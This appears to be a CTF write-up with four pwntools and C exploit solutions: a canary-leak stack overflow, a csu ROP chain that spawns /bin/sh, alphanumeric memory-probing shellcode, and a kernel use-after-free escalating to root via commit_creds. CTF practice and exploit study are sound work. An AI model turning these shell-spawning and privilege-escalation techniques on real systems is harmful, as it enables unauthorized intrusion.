string_go
简单栈溢出
from pwn import*
#r=remote("82.157.20.104",29800)
r=process('./main')  # local copy of the challenge binary; the commented-out remote() above is the live alternative
context.log_level='debug'  # log every byte exchanged, useful when the fixed recv offsets below drift
libc=ELF("./libc-2.27.so")  # provides the __libc_start_main symbol used to rebase the leaked pointer
def write(content):
    """Block until the target prints its ``>>> `` prompt, then send *content* as one line."""
    prompt = ">>> "
    r.recvuntil(prompt)
    r.sendline(content)
# Three expressions are sent; the output following the third is consumed as
# raw bytes at fixed offsets (0xd8, 8, 0x18, 8) rather than parsed.
write("1+(1+1)")
write("-1+1")
sleep(0.1)  # let the program finish printing before the next prompt is awaited
r.recvuntil(">>> ")
write("2+2")
r.recv(0xd8)  # skip output up to the leaked stack contents
canary=u64(r.recv(8))  # these 8 bytes are taken as the stack canary
r.recv(0x18)
# The next qword is taken as a saved return address inside __libc_start_main
# (+0xe7 is the call-site offset for this libc build, a constant from the
# write-up); subtracting the symbol yields libc's load address.
libc_base=u64(r.recv(8))-libc.sym['__libc_start_main']-0xe7
success("libc_base: "+hex(libc_base))
success("canary: "+hex(canary))
one_gadget=libc_base+0x4f3d5  # one-gadget offset for libc-2.27 (constant from the write-up)
r.recv()  # drain whatever output is still pending
r.recv()
r.sendline("1+2")
r.sendline("1+1")
# Overflow payload: 0x19 bytes of filler, the recovered canary, three padding
# qwords (presumably saved registers/rbp — not verifiable from here), then the
# return address. Both counts depend on this binary's stack frame layout.
r.sendline("a"*0x19+p64(canary)+p64(0)*3+p64(one_gadget))
r.interactive()
blind
参考文章:
将close修改为syscall并构造csu
需要爆破0xFF个字节确定syscall位置
from pwn import*
r=remote("82.157.6.165",30400)  # live instance; the commented-out process() below is the local alternative
#r=process('./main')
context.log_level='debug'
elf=ELF("./main")  # only GOT slots are read from the binary; the csu/main addresses below are fixed (non-PIE)
# Two halves of the __libc_csu_init gadget (addresses from the write-up): the
# first pops rbx, rbp, r12..r15 from the stack; the second loads the call
# arguments from those registers and calls through [r12 + rbx*8], then falls
# back into the first.  NOTE(review): the frame contents below match the
# pre-glibc-2.31 register mapping (rdi<-r15, rsi<-r14, rdx<-r13) — confirm by
# disassembling ./main.
csu1=0x4007BA
csu2=0x4007A0
read_got=elf.got['read']
alarm_got=elf.got['alarm']
sleep_got=elf.got['sleep']
main=0x4005C0  # not used below
payload='a'*0x58  # filler up to the saved return address
# Frame 1: read(0, alarm_got, 1) — paired with the one-byte send at the end.
payload+=p64(csu1)
payload+=p64(0)+p64(1)  # rbx, rbp (see csu note above)
payload+=p64(read_got)  # r12: pointer to the function that is called
payload+=p64(1)  # r13
payload+=p64(alarm_got)  # r14
payload+=p64(0)  # r15
payload+=p64(csu2)
# Frame 2: read(0, sleep_got+0x100, 8) — paired with the "/bin/sh\x00" send.
payload+=p64(0)  # padding qword before the next register set
payload+=p64(0)+p64(1)
payload+=p64(read_got)
payload+=p64(0x8)
payload+=p64(sleep_got+0x100)
payload+=p64(0)
payload+=p64(csu2)
# Frame 3: read(0, sleep_got+0x150, 0x3b) — paired with the 0x3b zero bytes sent
# last. Presumably its purpose is the return value left in rax rather than the
# data itself (see the write-up's syscall note) — confirm.
payload+=p64(0)
payload+=p64(0)+p64(1)
payload+=p64(read_got)
payload+=p64(0x3b)
payload+=p64(sleep_got+0x150)
payload+=p64(0)
payload+=p64(csu2)
# Frame 4: call through alarm's GOT entry (low byte rewritten by frame 1) with
# r15=sleep_got+0x100, r14=0, r13=0.
payload+=p64(0)
payload+=p64(0)+p64(1)
payload+=p64(alarm_got)
payload+=p64(0)
payload+=p64(0)
payload+=p64(sleep_got+0x100)
payload+=p64(csu2)
#gdb.attach(r)
r.send(payload.ljust(0x500,'\x00'))  # pad to the size the target reads
r.send('\x38')  # consumed by frame 1's one-byte read
r.send("/bin/sh\x00")  # consumed by frame 2's 8-byte read
r.send("\x00"*0x3b)  # consumed by frame 3's read
r.interactive()
code_project
出题人没有ban掉writev的syscall
构造writev并检测返回值,爆破flag可能存在的内存地址
from pwn import*
from ae64 import AE64
r=remote("82.157.31.181",23000)  # live instance; the commented-out process() below is the local alternative
#r=process('./main')
context(os='linux',arch='amd64',log_level='info')  # asm() below targets x86-64
r.recvline()  # discard two banner lines
r.recvline()
# Hand-written probe shellcode. It walks memory in 0x1000 steps starting at
# 0x1000000 and issues syscall 0x14 (writev, which the write-up says is not
# filtered) with fd=1 and a single 0x30-byte iovec built on the stack, so each
# mapped page echoes 0x30 bytes to stdout and unmapped ones presumably just
# return an error. Constants are loaded via push/pop rather than mov so the
# alphanumeric encoder below can represent them.
shell=b""
shell+=asm("add r14,0x11")  # r14 is expected to hold the loop's jump target (set up by the caller; not visible here)
shell+=asm("push 0x1000000")  # rbx = first address to probe
shell+=asm("pop rbx")
shell+=asm("push 0x14")  # rax = syscall number 0x14
shell+=asm("pop rax")
shell+=asm("push 0x1")  # rdi = fd 1 (stdout)
shell+=asm("pop rdi")
shell+=asm("push 0x1")  # rdx = iovcnt 1
shell+=asm("pop rdx")
shell+=asm("push 0x30")  # iovec on the stack: {iov_base = rbx, iov_len = 0x30}
shell+=asm("push rbx")
shell+=asm("mov rsi,rsp")  # rsi -> iovec
shell+=asm("syscall")
shell+=asm("cmp rax,0x30")  # NOTE(review): the flags set here are never branched on in this code
shell+=asm("add rbx,0x1000")  # advance one page
shell+=asm("jmp r14")  # loop back via r14
shell+=asm("hlt")  # not reached while the loop runs
# Encode to alphanumeric bytes; "rdx" names the register that points at the
# shellcode when it starts (presumably the target filters input to
# alphanumeric bytes — not shown here).
shell=AE64().encode(shell,"rdx",0,"small")
#gdb.attach(r,"b *0x400B16")
r.send(shell)
r.interactive()
easykernel
kmalloc-32以下的uaf
未开启smap,使用seq_operation泄露以及控制RIP流
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
#include <signal.h>
#include <unistd.h>
#include <syscall.h>
#include <pthread.h>
#include <linux/fs.h>
#include <sys/shm.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#define PAGE_SIZE 0x1000
int dev_fd;  // descriptor for /dev/kerpwn, opened in main()
uint64_t user_cs,user_ss,user_eflag,rsp;  // user-mode state captured by save_state(), placed in the return-to-user frame
// Snapshot the user-mode segment selectors, rflags and stack pointer into the
// globals above; main() writes them into the iretq frame at the end of its chain.
void save_state()
{
    asm(
        "movq %%cs, %0;"
        "movq %%ss, %1;"
        "movq %%rsp, %3;"
        "pushfq;"
        "pop %2;"
        : "=r"(user_cs),"=r"(user_ss),"=r"(user_eflag),"=r"(rsp)
        :
        : "memory"
    );
}
// Print a message on its own line and terminate the process with status 0
// (matching the original puts()/exit(0) behaviour).
void error(char *err)
{
    printf("%s\n", err);
    exit(0);
}
// Issue driver command 0x20 on dev_fd with the argument block {size, content pointer, 0};
// main() uses this as the allocation path. Returns the raw ioctl result, widened to 64 bits.
uint64_t new(uint64_t size,char *content)
{
    uint64_t arg[3] = {size, (uint64_t)content, 0};
    return (uint64_t)ioctl(dev_fd, 0x20, arg);
}
// Issue driver command 0x30 on dev_fd with the argument block {idx};
// main() uses this as the free path. Returns the raw ioctl result, widened to 64 bits.
uint64_t delete(uint64_t idx)
{
    uint64_t arg[1] = {idx};
    return (uint64_t)ioctl(dev_fd, 0x30, arg);
}
// Issue driver command 0x40 on dev_fd with the argument block {idx, size, output pointer};
// main() reads object contents back through it. Returns the raw ioctl result, widened to 64 bits.
uint64_t show(uint64_t idx,uint64_t size,char *recv_content)
{
    uint64_t arg[3] = {idx, size, (uint64_t)recv_content};
    return (uint64_t)ioctl(dev_fd, 0x40, arg);
}
// Issue driver command 0x50 on dev_fd with the argument block {idx, size, input pointer};
// main() overwrites object contents through it. Returns the raw ioctl result, widened to 64 bits.
uint64_t edit(uint64_t idx,uint64_t size,char *content)
{
    uint64_t arg[3] = {idx, size, (uint64_t)content};
    return (uint64_t)ioctl(dev_fd, 0x50, arg);
}
// Open /proc/self/stat read-only and return its descriptor.
// On failure, print a marker and exit(0) rather than returning -1.
int seq_open()
{
    int fd = open("/proc/self/stat", O_RDONLY);
    if (fd == -1)
    {
        puts("[X] seq Error");
        exit(0);
    }
    return fd;
}
// Spawn an interactive shell; main() uses this address as the user-mode return target.
void get_shell()
{
    const char *shell = "/bin/sh";
    system(shell);
}
int main()
{
    // Capture user-mode cs/ss/rflags/rsp first; they fill the iretq frame at the end of the chain.
    save_state();
    dev_fd=open("/dev/kerpwn",O_RDWR);
    if (dev_fd<0)
    {
        puts("[X] Device Open Error");
        exit(0);
    }
    uint64_t *buf=malloc(0x20); uint64_t *recv_buf=malloc(0x20);
    // Allocate one 0x20-byte object through the driver, then free it. Index 0 stays
    // readable and writable afterwards (the use-after-free the write-up describes).
    new(0x20,(char *)buf);
    delete(0);
    int seq;
    // Each open("/proc/self/stat") allocates a seq_operations struct (four function
    // pointers, the same kmalloc-32 size class). Re-read slot 0 until all four qwords
    // are non-zero, i.e. the freed chunk has been reused for one of those structs.
    for (int i=0; i<0x10; i++)
    {
        seq=seq_open();
        // NOTE(review): sizeof(recv_buf) is the size of the pointer (8), not of the
        // 0x20-byte buffer, so only recv_buf[0] is actually cleared between attempts.
        memset(recv_buf,0,sizeof(recv_buf));
        show(0,0x20,(char *)recv_buf);
        if (recv_buf[0]&&recv_buf[1]&&recv_buf[2]&&recv_buf[3]) break;
    }
    // recv_buf[0] is a kernel text pointer (the first seq_operations handler); every
    // offset below is specific to this kernel build and taken from the write-up.
    uint64_t kernel_base=recv_buf[0]-0x319D30;
    uint64_t prepare_kernel_cred=kernel_base+0xc91d0;
    uint64_t commit_creds=kernel_base+0xc8d40;
    uint64_t kpti_trampoline=kernel_base+0xc00f30;
    uint64_t gadget=kernel_base+0xe3b22;  // written into the hijacked function pointer below
    uint64_t pop_rdi=kernel_base+0x89250;
    uint64_t mov_rdi_rax=kernel_base+0xb72e8b;
    uint64_t swapgs_ret=kernel_base+0x75ef0;  // unused: the KPTI-trampoline return path is taken instead
    uint64_t iretq=kernel_base+0x3a2ab;  // unused, see above
    printf("[+] kernel_base: 0x%lx\n",kernel_base);
    printf("[+] prepare_kernel_cred: 0x%lx\n",prepare_kernel_cred);
    printf("[+] commit_creds: 0x%lx\n",commit_creds);
    // Map a user page at the 32-bit truncation of `gadget` (the mask is a 32-bit
    // constant, so the upper half of the address is dropped) and place the chain at
    // +0xb22, i.e. exactly at gadget's low 32 bits. Presumably `gadget` pivots the
    // stack to a 32-bit register value — confirm against the kernel image. Kernel
    // code can only fetch the chain from this user page because SMAP is off (write-up).
    uint64_t *mmap_addr=mmap((void *)(gadget&0xFFFFF000),PAGE_SIZE,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANONYMOUS|MAP_SHARED,-1,0);
    printf("[+] mmap_addr: 0x%lx\n",(uint64_t)mmap_addr);
    uint64_t *ROP=(uint64_t *)(((char *)mmap_addr)+0xb22),i=0;
    // commit_creds(prepare_kernel_cred(0)) ...
    *(ROP+i++)=pop_rdi;
    *(ROP+i++)=0;
    *(ROP+i++)=prepare_kernel_cred;
    *(ROP+i++)=mov_rdi_rax;  // hand the returned cred pointer to the next call
    *(ROP+i++)=commit_creds;
    // ... then return to user mode through the KPTI trampoline entered at +22: two
    // qwords it pops first (not verifiable here), then the iretq frame rip/cs/rflags/rsp/ss.
    *(ROP+i++)=kpti_trampoline+22;
    *(ROP+i++)=0;
    *(ROP+i++)=0;
    *(ROP+i++)=(uint64_t)get_shell;  // user-mode return target
    *(ROP+i++)=user_cs;
    *(ROP+i++)=user_eflag;
    *(ROP+i++)=rsp;
    *(ROP+i++)=user_ss;
    // Overwrite the first qword of the freed-and-reused chunk (now a seq_operations
    // handler pointer) with the gadget, then trigger that handler with a read on the seq file.
    buf[0]=(uint64_t)gadget;
    edit(0,0x20,(char *)buf);
    read(seq,NULL,0);
}